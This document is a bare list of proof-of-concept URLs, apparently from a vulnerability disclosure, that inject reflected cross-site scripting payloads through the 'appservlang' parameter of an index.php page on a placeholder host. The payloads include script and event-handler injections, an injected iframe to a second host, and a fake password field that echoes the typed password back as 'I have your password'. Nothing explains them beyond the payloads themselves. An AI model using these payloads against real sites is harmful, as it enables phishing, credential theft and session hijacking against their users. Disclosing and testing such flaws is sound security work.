http://www.example.com/index.php?appservlang=&quot;&gt;[XSS]

http://www.example.com/index.php?appservlang=&quot;&gt;&lt;IMG%20SRC=java  script:alert(/XSS/)&gt;
http://www.example.com/index.php?appservlang=&quot;&gt;&lt;BODY%20ONLOAD=alert(/ 
 xss/)&gt;

http://www.example.com/index.php?appservlang=&quot;&gt;&lt;script&gt;window.open(/phpinfo.php/)&lt;/script&gt;
http://www.example.com/index.php?appservlang=&quot;&gt;&lt;INPUT%20TYPE=&quot;xss&quot;&gt;

http://www.example.com/index.php?appservlang=&quot;&gt;&lt;iframe%20src=http://www.example2.com&gt;
http://www.example.com/index.php?appservlang=&quot;&gt;&lt;BR&gt;&lt;input%20type%20=%20&quot;password&quot;%20name=&quot;pass&quot;/&gt;&lt;button%20onClick=&quot;java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);&quot;&gt;Submit&lt;/button&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;